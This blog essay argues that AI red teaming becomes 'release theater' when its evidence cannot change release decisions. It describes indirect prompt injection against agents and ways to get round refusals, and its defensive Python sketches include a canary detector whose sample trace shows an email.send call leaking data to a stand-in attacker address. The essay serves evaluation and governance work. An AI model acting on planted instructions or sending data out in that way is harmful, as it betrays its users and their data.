Blog · Analysis · Last reviewed June 23, 2026

The Red Team Becomes the Release Theater

AI red teaming can expose real failures. It can also become a public ritual that makes a model look governed before the institution knows what the test actually proved.

The governance test is whether adversarial evidence can change a release decision, not whether an organization can say attackers were invited into the room.

From Security to Governance

Red teaming has moved from cybersecurity practice into the language of AI legitimacy.

In the older security sense, a red team attacks a system so its defenders can learn. The method assumes that design review and ordinary testing miss important failures. A motivated adversary finds paths through the architecture, the process, the interface, and the people. The value is not theater. The value is discovery under pressure.

AI changed the object being attacked. A model can fail by exposing harmful instructions, producing false claims, leaking data, amplifying bias, following malicious instructions hidden in retrieved text, giving dangerous assistance, or behaving differently across languages, contexts, and tool-use settings. The test is no longer only whether an intruder can break in. It is whether a system that speaks, recommends, ranks, drafts, searches, reasons, or acts can be induced into unsafe behavior.

For this essay, an AI red team is a scoped adversarial evaluation of a model, product, agent, or deployment workflow. It should name the threat model, the system version, the access path, the evaluator role, the evidence collected, and the decision the evidence can affect.

Release theater is the conversion of that adversarial evaluation into a permission ritual. The institution can say the model was red-teamed while the scope, version, access level, evaluator independence, unresolved findings, mitigation evidence, and authority to delay release remain unclear. The dangerous claim is not "we found failures." It is "we performed the ritual, therefore the release is governed."

The boundary is simple: a red team is a method, an evaluation is a body of evidence, and a safety case is an argument that the evidence supports a deployment decision. Release theater begins when the method is marketed as if it were the argument.

A serious claim also needs a red-team modality label. Internal staff campaigns, external expert campaigns, public contests, automated attack generation, regulator or safety-institute evaluations, bug-bounty reports, and post-incident investigations are different evidence types. They can inform each other, but they should not be collapsed into one reassuring verb.

For release use, the minimum artifact is a red-team evidence file: tested system identity, model or product version, access level, tools and permissions, threat model, evaluator role, sample design, severity rubric, accepted findings, rejected or unresolved signals, mitigation owner, retest result, residual-risk owner, and the release decision the evidence was allowed to affect.
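One way to keep that artifact honest is to treat it as a record with required fields rather than a narrative memo. The sketch below is illustrative only: the class name, field names, and example values are assumptions that mirror the list above, not a published schema.

```python
from dataclasses import dataclass, fields


@dataclass
class RedTeamEvidenceFile:
    """One record per red-team exercise; field names are illustrative."""
    system_identity: str = ""
    version: str = ""
    access_level: str = ""
    tools_and_permissions: str = ""
    threat_model: str = ""
    evaluator_role: str = ""
    sample_design: str = ""
    severity_rubric: str = ""
    accepted_findings: str = ""
    rejected_or_unresolved_signals: str = ""
    mitigation_owner: str = ""
    retest_result: str = ""
    residual_risk_owner: str = ""
    release_decision_affected: str = ""


def missing_fields(record: RedTeamEvidenceFile) -> list[str]:
    """Return the names of fields left blank, in declaration order."""
    return [f.name for f in fields(record) if not getattr(record, f.name).strip()]


draft = RedTeamEvidenceFile(
    system_identity="example-assistant",  # hypothetical system name
    version="2026-06-rc1",                # hypothetical version label
    threat_model="indirect prompt injection via retrieved documents",
)
print(missing_fields(draft))
```

A blank field is not proof of bad faith, but it is a concrete question a reviewer can ask before the phrase "red-teamed" appears in a release note.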

That is why red teaming now appears in official governance. NIST's AI glossary defines AI red teaming as a structured testing effort, often using adversarial methods, to find flaws, vulnerabilities, unforeseen behaviors, and misuse risks. NIST's generative AI profile treats red teaming as one method among participatory engagement, field testing, and other evaluations. NIST's ARIA (Assessing Risks and Impacts of AI) program explicitly combines model testing, red teaming, and field testing to examine technical and contextual robustness.

The European Union has pushed the practice into law for the most powerful general-purpose models. Article 55 of the AI Act requires providers of general-purpose AI models with systemic risk to perform model evaluation using state-of-the-art protocols and tools, including documented adversarial testing, to identify and mitigate systemic risks.

The result is a new governance object: not the model, not the benchmark, not the audit, but the adversarial event. A red team exercise becomes evidence. It can feed a safety case, a system card, a procurement decision, a regulator briefing, a launch gate, or a public claim that the provider took safety seriously.

Current Context

As of June 23, 2026, AI red teaming is no longer only a voluntary lab custom or conference practice. It sits inside standards work, regulator-facing obligations, public-sector evaluations, and frontier-lab release frameworks. NIST's test, evaluation, validation and verification (TEVV) work frames trustworthy AI as depending on reliable measurements and evaluations; ARIA uses model testing, red teaming, and field testing; the Center for AI Standards and Innovation (CAISI) says it leads unclassified evaluations of AI capabilities that may pose national-security risks. NIST's 2025 adversarial machine-learning taxonomy also gives that standards work a common language for attack lifecycle stages, attacker goals, capabilities, knowledge, and mitigation limits.

The EU AI Act makes documented adversarial testing part of the duties for general-purpose AI models with systemic risk. The European Commission's General-Purpose AI Code of Practice, published in 2025 and last updated in Commission materials on April 23, 2026, supplies a voluntary compliance path whose Safety and Security chapter is aimed at those systemic-risk models. That does not make a red team legally sufficient by itself. It makes adversarial testing part of the evidence trail that providers, regulators, auditors, and affected deployers can ask to inspect.

Frontier developers have also turned adversarial evidence into release machinery. OpenAI's 2025 Preparedness Framework ties severe-risk categories to capability reports, safeguards reports, residual-risk review, and deployment recommendations. Anthropic's Responsible Scaling Policy, last updated May 26, 2026, connects capability thresholds to risk reports, safeguards, external review, noncompliance reporting, and anti-retaliation policy. Google DeepMind's Frontier Safety Framework, updated April 17, 2026, describes holistic risk assessment and safety-case reviews when critical capability levels are reached.

CAISI's current institutional role matters here. NIST describes it as industry's primary U.S. government contact for testing and collaborative research on commercial AI systems, including voluntary agreements with developers and evaluators. On May 5, 2026, NIST announced expanded CAISI agreements with Google DeepMind, Microsoft, and xAI for pre-deployment evaluations and targeted research on frontier AI capabilities. That does not create a general licensing regime. It does show that red-team and evaluation language is moving into procurement, standards, national-security, and regulator-facing policy, where vague claims become harder to excuse.

This makes the theater problem sharper. Red teaming is becoming more consequential, but not automatically more accountable. A test can be technically useful and institutionally weak at the same time if the people who find the failures cannot force remediation, trigger retesting, preserve dissent, notify affected deployers, preserve audit trails, or stop a release when the evidence is poor.

The practical consequence is that red-team evidence should travel with its boundary conditions. A 2026 company framework, public contest, regulator-facing submission, or safety-institute collaboration should be read as a dated claim about a particular system, access path, and governance process, not as a reusable certificate for every later product wrapper.

The Public Red Team

The most visible symbol of this shift was the public generative-AI red team at DEF CON 31 in 2023.

AI Village announced the event with support from the White House Office of Science and Technology Policy, the National Science Foundation's CISE Directorate, and the Congressional AI Caucus. The scale was the point. Humane Intelligence's overview says 2,244 hackers evaluated eight large language models and produced more than 17,000 conversations across 21 topics, from cybersecurity to misinformation and human rights. The event treated public adversarial probing as both safety work and civic education: more people would learn how these systems fail, and providers would receive evidence about failure modes that ordinary internal review might not reveal.

That public form matters. It broke the assumption that AI safety testing must occur entirely inside corporate labs. It also showed the limits of spectacle. A crowd can find vivid examples of failure. A timed challenge can generate useful traces. But a capture-the-flag format is not automatically a statistically meaningful evaluation of model behavior. AI Village's later announcement for a second generative red team made this point directly: single examples can reveal where to look, but serious evaluation needs datasets, reporting structures, adjudication, rate estimates, and public evidence about what changed afterward.

This is the central tension. Public red teaming democratizes attention. It lets people outside a company touch the system, discover harms, compare notes, and build expertise. But if the event becomes the proof, the logic reverses. The institution can point to the crowd instead of explaining the method. The release story becomes: many people attacked it, therefore the system is ready.

The public benefit is not the spectacle; it is the trace. A civic red team should leave an artifact that says what was tested, how reports were adjudicated, which classes of failure were accepted as valid, what was fixed, what was not fixed, and whether the next release changed scope.

The artifact should also say what kind of public exercise it was. Civic education, vulnerability disclosure, model evaluation, policy contestation, dataset construction, and product-release assurance are related but distinct. A public challenge can be valuable even when it is not release evidence. It becomes theater when the organization borrows the visibility of public participation without accepting the evidentiary discipline that would let outsiders see what changed.

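None of this means that a well-attended attack proves readiness. The inference from "many people attacked it" to "the system is ready" does not follow. A red team is a searchlight, not a guarantee.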

What Red Teaming Can Prove

Red teaming is valuable because it finds failures that clean evaluation often misses.

Benchmarks usually ask a system to perform specified tasks under specified conditions. Red teaming asks what happens when the conditions become hostile, weird, social, multilingual, goal-shifted, or institutionally realistic. It tests the guardrail, not only the capability. It tests the gap between stated policy and actual behavior. It turns a model from an object of measurement into a participant in a contested interaction.

For AI systems, that contested interaction is often the point. Users do not simply submit neutral tasks. They persuade, trick, misunderstand, role-play, pressure, conceal, chain tools, paste context, ask for exceptions, and exploit ambiguity. Organizations also use models in workflows full of incentives and shortcuts. A customer-support bot faces angry users. A coding agent reads hostile repositories. A legal assistant ingests adversarial documents. A workplace assistant sees permissions that no single employee has cognitively mapped. A public-service chatbot faces people asking desperate questions with incomplete facts.

A good red team can reveal these edges. It can show that a model follows instructions hidden inside a web page. It can show that a supposedly blocked capability is reachable through translation, analogy, staged reasoning, or tool use. It can show that safety performance differs sharply across models, languages, domains, or deployment settings. It can create a record that engineers, lawyers, procurement officers, and regulators can use.

The practice also creates a labor force and a language. People learn how to describe AI failures, classify them, reproduce them, and dispute provider responses. That matters because model-mediated knowledge systems do not fail only through spectacular disasters. They fail through small repeated deformations: false confidence, hidden deference, unsafe defaults, permission leakage, synthetic authority, and user adaptation to the machine's preferred path. That language should connect to the neighboring practices of AI evaluations, AI safety cases, and model cards and system cards, because the test is only one part of the evidence chain.

The strongest finding is not a trophy prompt. It is a lifecycle record: threat model, attack path, affected system version, access conditions, severity rationale, reproduction evidence, mitigation owner, retest result, residual risk, and handoff into monitoring or incident response. That record is what lets a red-team result become governance evidence rather than private safety folklore.

What It Cannot Prove

Red teaming becomes dangerous when it is treated as proof of safety.

The first limitation is sampling. A red team searches part of a huge behavioral space. Even a large event cannot cover every prompt, language, user population, tool chain, retrieval source, policy conflict, or institutional setting. Finding failures proves the system can fail. Not finding a failure proves much less.

The second limitation is incentives. If the provider defines the scope, controls the model version, selects the tasks, withholds logs, classifies reports, and writes the summary, the exercise may be adversarial only at the surface. The red team attacks the system, but the institution controls what counts as a wound.

The third limitation is repair theater. A company can fix the examples without fixing the class of failure. It can patch prompts, blacklist strings, add refusal templates, or tune around the public exploit while leaving the underlying pattern intact. In generative systems, the visible exploit is often just one path through a broader behavioral pattern.

The fourth limitation is release timing. Red teaming is often concentrated before launch, when the product team wants a green light. But deployed systems drift. They receive new tools, connectors, memories, policies, model updates, retrieval corpora, plugins, and user habits. A pre-release exercise can become stale almost immediately after deployment.

The fifth limitation is public meaning. Red teaming has cultural force. It sounds tough, adversarial, and empirical. That makes it easy to convert into a badge. The claim "we red-teamed the model" can function like "we audited the system" or "we published a system card": not false, but incomplete. The verb becomes a halo around a process the public cannot inspect.

The sixth limitation is authority. A red team can discover severe risk and still have no power over the release gate. If the provider can absorb the report, narrow the finding, delay disclosure, and launch anyway, the adversarial event has produced knowledge without leverage.

The seventh limitation is transfer. A failure found in a chat surface may not predict a tool-use surface; a patch in English may not hold in other languages; a refusal improvement in a hosted model may not apply to an open-weight, fine-tuned, or downstream-wrapped derivative. Red-team claims should not travel farther than the tested path.
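The sampling limitation can be made concrete with a small calculation. If a team runs n attempts and observes zero failures, the largest per-attempt failure rate still consistent with that result at a given confidence level solves (1 - p)^n = 1 - confidence, which is roughly 3/n at 95 percent (the "rule of three"). The sketch below assumes independent attempts drawn from the same distribution the deployed system will face. Real red-team probes rarely satisfy that assumption, so the real-world guarantee is weaker than the number printed. The function name is illustrative.

```python
def max_failure_rate_consistent_with_zero_hits(n_attempts: int, confidence: float = 0.95) -> float:
    """Upper confidence bound on the per-attempt failure rate after n clean attempts.

    Solves (1 - p) ** n = 1 - confidence for p. Assumes independent attempts
    drawn from the same distribution the deployed system will face.
    """
    if n_attempts <= 0:
        raise ValueError("n_attempts must be positive")
    if not 0.0 < confidence < 1.0:
        raise ValueError("confidence must be strictly between 0 and 1")
    return 1.0 - (1.0 - confidence) ** (1.0 / n_attempts)


for n in (100, 1_000, 10_000):
    bound = max_failure_rate_consistent_with_zero_hits(n)
    print(f"{n:>6} clean attempts: failure rate could still be up to {bound:.4%}")
```

Even under these generous assumptions, a clean run of a few hundred prompts leaves room for a failure rate that would matter at deployment scale, where the number of interactions can exceed the test size by many orders of magnitude.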

Agentic Systems Change the Test

Agentic AI makes red teaming more important and less sufficient.

When a chatbot only answers in text, a failure may be dangerous because it informs, persuades, or misleads. When an agent uses tools, a failure can become action. It may send email, edit code, call APIs, purchase goods, move files, query private data, operate a browser, or change an institutional record.

CAISI's March 2026 write-up on a large-scale AI agent red-teaming competition focused on agent hijacking, also known as indirect prompt injection. In those attacks, malicious instructions are placed inside data that an agent later reads: a web page, email, document, repository, or other external source. CAISI reported that the competition covered 13 frontier models across tool-use, coding-agent, and computer-use scenarios, with more than 250,000 attack attempts by over 400 participants. At least one successful attack was found against every target model.

The important point is not that every model is doomed. The important point is that the attack surface moved into the world. The adversary may not talk to the model directly. They may write the document the model will later trust. They may shape the environment the model treats as context.

That changes governance. A red team for an agent must test the model, the tools, the permission system, the connector layer, the logs, the recovery path, and the human handoff. It must ask whether the system can distinguish user intent from environmental instruction. It must ask what the agent can do before a human notices. It must ask how an organization reconstructs the chain of delegated action after something goes wrong.

For agents, the red-team unit should be the run, not only the model. The evidence has to include tool manifests, permission scopes, sandbox boundaries, connector policies, confirmation gates, logs, rollback paths, and incident triggers. A successful attack is not just an unsafe answer; it is an unauthorized chain of delegated action.

The critical transition is when untrusted context becomes authority. A hostile web page, email, repository, ticket, spreadsheet, or shared document should remain evidence to be interpreted, not instruction to be obeyed. Agent red teams therefore need canary records, test tenants, scoped credentials, reversible tools, and audit traces that show exactly when a model treated environmental text as a command.
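A canary record can be as simple as a unique string planted inside a hostile test document, paired with a check on the agent's logged tool calls. The sketch below is a minimal illustration under stated assumptions: the `ToolCall` shape, the tool names, and the canary value are hypothetical, and the trace is assumed to come from a test tenant with scoped credentials. A canary in a tool argument is a signal for human review, not a verdict, since an agent may also quote untrusted text for legitimate reasons.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolCall:
    step: int
    tool: str
    arguments: str  # serialized arguments exactly as logged


def find_canary_leaks(trace: list[ToolCall], canary: str) -> list[ToolCall]:
    """Return the tool calls whose logged arguments contain the planted canary."""
    return [call for call in trace if canary in call.arguments]


CANARY = "CANARY-7f3a91"  # hypothetical marker planted in a hostile test document

trace = [
    ToolCall(1, "browser.open", '{"url": "https://test-tenant.example/doc"}'),
    ToolCall(2, "email.send", '{"to": "attacker@example.com", "body": "CANARY-7f3a91"}'),
    ToolCall(3, "files.list", '{"path": "/sandbox"}'),
]

for leak in find_canary_leaks(trace, CANARY):
    print(f"step {leak.step}: {leak.tool} carried canary text into an action")
```

The useful output is the step number: it marks the point in the run where environmental text crossed into delegated action, which is the moment an incident review will need to reconstruct.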

This links red teaming to broader analysis of the agent log as receipt, the tool server as trust boundary, the enterprise connector as permission map, the agent sandbox as airlock, prompt injection, AI agent observability, AI agent sandboxing, and agent audit and incident review. Red teaming is not a separate ritual. It is one instrument inside the governance of delegated machine action.

Failure Modes

Scope laundering. A narrow model-only exercise is described as if it covered the deployed product, even though the released system adds retrieval, memory, tools, connectors, policy layers, or user workflows the red team did not test.

Snapshot laundering. A result from one model version, system prompt, safeguard stack, dataset, interface, or access tier is carried forward after the system changes. The badge survives after the evidence expires.

Prompt trophy hunting. The process rewards memorable jailbreaks but does not measure severity, frequency, affected population, exploit transfer, mitigation durability, or whether the class of failure persists.

Mitigation theater. The provider patches the submitted examples, reruns a small regression set, and calls the issue resolved without showing that the underlying attack path has been closed.

Authority gap. Red teamers can find severe risk but cannot require remediation, retesting, customer notice, launch delay, board escalation, regulator notice, or preservation of a dissenting finding.

Confidentiality trap. Some findings must be withheld to avoid spreading exploit details, especially in cyber, biological, infrastructure, or child-safety domains. But secrecy can also hide scope, severity, and whether anything changed. Responsible withholding still needs a trusted evidence file.

Automated overconfidence. AI-generated attacks can expand coverage, but a large synthetic test set is not automatically realistic, diverse, severe, or correctly judged. Automated red teaming needs human validation, threat modeling, and retesting against the deployed system.

Reviewer capture. External testers become dependent on access, NDA terms, future contracts, publication approval, or public credit, and the provider gains the benefits of independence without accepting independent authority.

Modality laundering. A company treats an internal exercise, a public contest, an automated prompt generator, a safety-institute collaboration, and a bug-bounty queue as equivalent because each can be described as "red teaming."

Benchmark substitution. A static evaluation set or public leaderboard is treated as a red team even when no adaptive adversary tested the actual release path.

Incident disconnect. Red-team findings do not feed monitoring, user reporting, customer notification, bug bounty, incident-response, or postmortem systems, so deployment learns the same lesson again through harm.

Evidence evaporation. Reports that are rejected, unreproduced, duplicate, out of scope, or fixed quietly disappear instead of feeding a pattern review, risk register, regression suite, or later safety case.

Evidence laundering. A public summary converts narrow findings into broad assurance by omitting tested scope, unsupported claims, unresolved signals, mitigation failures, or the authority that accepted residual risk.

Participation theater. A public event can be valuable civic education, but participant count is not a safety metric. The governance question is whether the event produced reproducible findings, accountable mitigations, and public memory.
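Scope laundering and snapshot laundering both come down to a mismatch between the configuration that was tested and the configuration that ships. A minimal guard, assuming the tested setup can be captured as a plain dictionary, is to fingerprint both and refuse to reuse evidence when they differ. The keys and values below are hypothetical, and a real system would need to capture far more than this sketch does.

```python
import hashlib
import json

_MISSING = object()  # sentinel so an absent key never compares equal to a present one


def config_fingerprint(config: dict) -> str:
    """Hash a canonical JSON rendering of the configuration."""
    canonical = json.dumps(config, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def changed_keys(tested: dict, candidate: dict) -> list[str]:
    """List top-level keys whose values differ or that exist on only one side."""
    keys = sorted(set(tested) | set(candidate))
    return [k for k in keys if tested.get(k, _MISSING) != candidate.get(k, _MISSING)]


tested = {
    "model_version": "m-2026-05",   # hypothetical identifiers throughout
    "system_prompt_sha": "abc123",
    "tools": ["search"],
    "languages": ["en"],
}
candidate = {**tested, "tools": ["search", "email.send"]}

if config_fingerprint(tested) != config_fingerprint(candidate):
    print("evidence does not cover release candidate; changed:",
          changed_keys(tested, candidate))
```

A matching fingerprint does not show the evidence is sufficient. It only shows the claim is being made about the same object that was tested.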

The Governance Standard

A serious AI red-team regime should leave behind more than anecdotes. It should meet nineteen tests.

First, scope should be explicit. The report should say what model version, system prompt, tools, policies, languages, domains, user roles, and deployment settings were tested. A model-only red team should not be used to certify an agentic product.

Second, the team should fit the risk. NIST's generative AI profile emphasizes that red-team output depends on the team's background and expertise. Medical, legal, education, cybersecurity, labor, child-safety, and public-service systems need domain expertise, not only clever prompting.

Third, the method should distinguish examples from rates. A single jailbreak can be important, but governance decisions need to know whether the problem is rare, common, localized, transferable, patched, or structurally unresolved.

Fourth, findings should map to mitigations. A red team should not end with a list of impressive failures. It should produce design changes, policy changes, monitoring plans, release conditions, and unresolved-risk statements.

Fifth, independence should be real. Internal red teams are useful, but external testing, public-interest researchers, regulator access, and protected disclosure channels matter when the provider has a launch incentive.

Sixth, public summaries should be meaningful. Trade secrets and exploit details may need protection, but the public should be able to see categories of risk, severity, scope, mitigation status, and residual uncertainty. Otherwise the red team becomes private knowledge converted into public legitimacy.

Seventh, testing should continue after deployment. Model updates, new tools, retrieval changes, and user behavior can reopen old failures or create new ones. Release is not the end of adversarial evaluation. It is the beginning of exposure to adversaries who are no longer playing by the test rules.

Eighth, authority should be named. A red-team report should identify who can block launch, require remediation, order retesting, notify customers, escalate to a board or regulator, or preserve a dissenting safety judgment. Without named authority, adversarial evidence becomes advice.

Ninth, participant safety and disclosure rights should be designed. Red teamers may handle disturbing content, security-sensitive findings, or evidence of institutional negligence. Compensation, support, reporting channels, safe-harbor rules, and anti-retaliation protections are part of the governance system, not courtesy extras.

Tenth, the evidence should connect to release gates. Red-team findings should feed a safety case, system card, procurement condition, rollout restriction, or deployment decision. Evidence that cannot change the decision is only advisory.

Eleventh, records should be versioned and inspectable. The institution should preserve prompts, tools, logs, severity rubrics, adjudication notes, mitigation owners, retest results, and unresolved findings in an AI audit trail appropriate to the sensitivity of the material.

Twelfth, public claims should state what was not proved. A serious summary should distinguish "we found failures," "we patched submitted examples," "we reduced measured attack success," "we tested this release path," and "we are accepting residual uncertainty." Those are different claims.

Thirteenth, retesting should be a release condition. A mitigation should not count as closed until the class of failure is retested against the actual release candidate, not only against the submitted examples.

Fourteenth, residual risk should have an owner. Unresolved findings should identify who accepted the risk, what compensating controls exist, what trigger reopens the decision, and what deployers or customers were told.

Fifteenth, red teams should connect to incidents. Severe findings should seed monitoring, abuse reporting, customer notice, bug bounty, incident-response, and post-deployment review systems.

Sixteenth, release claims should be traceable. Public statements such as "red-teamed," "externally evaluated," "safe to deploy," or "frontier framework compliant" should point to a dated evidence artifact, the tested scope, and the claims not supported.

Seventeenth, label the evidence modality. Public summaries should distinguish internal red team, external expert campaign, public contest, automated red team, safety-institute evaluation, bounty report, incident finding, and customer deployment test. Each answers a different governance question.

Eighteenth, preserve rejected and unresolved signals. Findings ruled duplicate, inconclusive, unreproduced, out of scope, or temporarily mitigated should still be retained where they point to plausible severe risk. A red-team program should learn from its weak signals, not only from accepted trophies.

Nineteenth, controlled access should exist for serious reviewers. Public summaries can redact exploit detail, but regulators, safety institutes, qualified auditors, and high-impact buyers may need controlled access to versioned scope, severity, mitigation, retest, residual-risk, and decision records.
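Several of these tests (evidence connected to release gates, retesting as a release condition, a named residual-risk owner) can be expressed as a mechanical check that runs before a launch decision. The following is a sketch under assumptions, not a recommended policy: the `Finding` fields, the severity labels, and the rule that a named owner may accept a failed retest are all illustrative choices an institution would have to make for itself.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    finding_id: str
    severity: str                    # "low", "medium", "high", or "critical"
    class_retested_on_candidate: bool
    retest_passed: bool
    residual_risk_owner: str = ""    # named person or body accepting leftover risk


BLOCKING_SEVERITIES = {"high", "critical"}  # assumed rubric, not from any standard


def release_blockers(findings: list[Finding]) -> list[str]:
    """Return human-readable reasons the release gate should stay closed."""
    reasons = []
    for f in findings:
        if f.severity not in BLOCKING_SEVERITIES:
            continue
        if not f.class_retested_on_candidate:
            reasons.append(f"{f.finding_id}: failure class not retested on release candidate")
        elif not f.retest_passed and not f.residual_risk_owner:
            reasons.append(f"{f.finding_id}: retest failed and no residual-risk owner named")
    return reasons


findings = [
    Finding("RT-001", "critical", class_retested_on_candidate=True, retest_passed=True),
    Finding("RT-002", "high", class_retested_on_candidate=False, retest_passed=False),
    Finding("RT-003", "high", class_retested_on_candidate=True, retest_passed=False),
    Finding("RT-004", "low", class_retested_on_candidate=False, retest_passed=False),
]

blockers = release_blockers(findings)
print("BLOCK" if blockers else "PROCEED", blockers)
```

The code is trivial on purpose. The hard part is institutional: someone with authority has to agree that a non-empty list actually stops the launch.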

What This Changes

The red team is a ritual of controlled opposition.

At its best, that ritual disciplines power. It gives critics a sanctioned path into the system before the system hardens into infrastructure. It converts dissent into evidence. It lets an institution learn from attack without waiting for public harm.

At its worst, it domesticates opposition. The institution stages an attack, absorbs the findings, publishes a vague assurance, and proceeds. The adversary becomes part of the release ceremony. The public sees conflict and mistakes it for accountability.

This is the recursive trap. AI systems are increasingly used to produce knowledge, classify risk, manage work, and mediate public reality. Institutions then use AI red teaming to produce knowledge about those systems. The test shapes what failure means. The report shapes what regulators and buyers believe. That belief shapes adoption. Adoption creates the next reality to be tested.

The answer is not to dismiss red teaming. It is to refuse the theater version. Red teaming should make uncertainty visible, not launder it. It should create institutional memory, not launch decoration. It should open the model to skilled antagonism and then show what changed because of what was found.

A good red team does not say the system is safe. It says: here is how we tried to break it, here is what broke, here is what we fixed, here is what remains unknown, and here is who can stop deployment if the unknowns are too large.

Source Discipline

This article treats NIST and EU materials as governance context, not certification. NIST definitions, TEVV, ARIA, AI 100-2e2025, and CAISI work show how official measurement and security language is developing. EU Article 55 and the GPAI Code of Practice show legal duties and a voluntary compliance route for systemic-risk general-purpose models. None of those sources proves that a particular model release was safe.

Company frameworks are primary evidence of declared process. OpenAI's Preparedness Framework, Anthropic's Responsible Scaling Policy, and Google DeepMind's Frontier Safety Framework say how those organizations intend to classify risk, review safeguards, and make release decisions. They are not independent verification that any specific deployment met those standards.

Public red-team event pages and organizer summaries are evidence about event design and reported counts. They should not be inflated into claims about statistical coverage, post-event mitigation, or release readiness unless those claims are separately documented.

Red-team sources also differ by modality. A company framework proves declared process; a public-event recap proves event design and reported participation; a government or safety-institute source may prove access, measurement method, or collaboration; a bug-bounty page proves an intake channel and reward policy; an incident report proves that a failure reached deployment. None of those artifacts automatically proves that a release decision was correct.

A source-disciplined red-team claim should name the system version, access route, tool permissions, evaluator independence, threat model, sample design, severity rubric, mitigation status, unresolved findings, retest date, and release authority. Public reports can omit exploit details for safety, but they should not omit whether severe categories existed, whether release scope changed, or who had power to say no.

Source dates matter because institutional names, public-private agreements, code-of-practice materials, and company safety frameworks change. A claim based on CAISI, NIST ARIA, EU GPAI materials, OpenAI, Anthropic, Google DeepMind, or a public red-team event should carry the review date and should not be reused after a new model, tool surface, framework version, or legal guidance changes the tested boundary.

For this review, current-source claims were checked on June 23, 2026 against official or primary sources where possible: NIST and CAISI for U.S. measurement and institute context, the European Commission and AI Act Service Desk for EU legal context, company pages for declared framework versions, and event organizers for DEF CON participation counts.

Sources

NIST CSRC Glossary, red teaming, citing NIST AI 100-2e2025, reviewed June 23, 2026.
NIST CSRC, Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations, NIST AI 100-2 E2025, March 24, 2025.
NIST, Artificial Intelligence Risk Management Framework: Generative Artificial Intelligence Profile, NIST AI 600-1, July 26, 2024, updated April 8, 2026, reviewed June 23, 2026.
NIST, AI test, evaluation, validation and verification, reviewed June 23, 2026.
NIST, Assessing Risks and Impacts of AI, ARIA program page, reviewed June 23, 2026.
NIST, Center for AI Standards and Innovation, reviewed June 23, 2026.
NIST GovDelivery bulletin, CAISI Signs Agreements Regarding Frontier AI National Security Testing With Google DeepMind, Microsoft and xAI, May 5, 2026.
European Commission AI Act Service Desk, Article 55: Obligations of providers of general-purpose AI models with systemic risk, Regulation (EU) 2024/1689, reviewed June 23, 2026.
European Commission, The General-Purpose AI Code of Practice, last updated April 23, 2026, reviewed June 23, 2026.
OpenAI, Our updated Preparedness Framework, April 15, 2025.
OpenAI, Advancing red teaming with people and AI, November 21, 2024.
OpenAI, OpenAI's Approach to External Red Teaming for AI Models and Systems, arXiv, 2025.
Anthropic, Responsible Scaling Policy Updates, last updated May 26, 2026.
Google DeepMind, Strengthening our Frontier Safety Framework, September 22, 2025, updated April 17, 2026.
AI Village, AI Village at DEF CON announces largest-ever public Generative AI Red Team, May 3, 2023.
Humane Intelligence, DEFCON 2023 overview, with the 2,244-participant, eight-model, 17,000-conversation, 21-topic figures, reviewed June 23, 2026.
AI Village, Generative Red Team Recap, October 2023.
AI Village, AI Village Announcing Generative Red Team 2 at DEF CON 32, June 10, 2024.
NIST CAISI Research Blog, Insights into AI Agent Security from a Large-Scale Red-Teaming Competition, March 23, 2026.
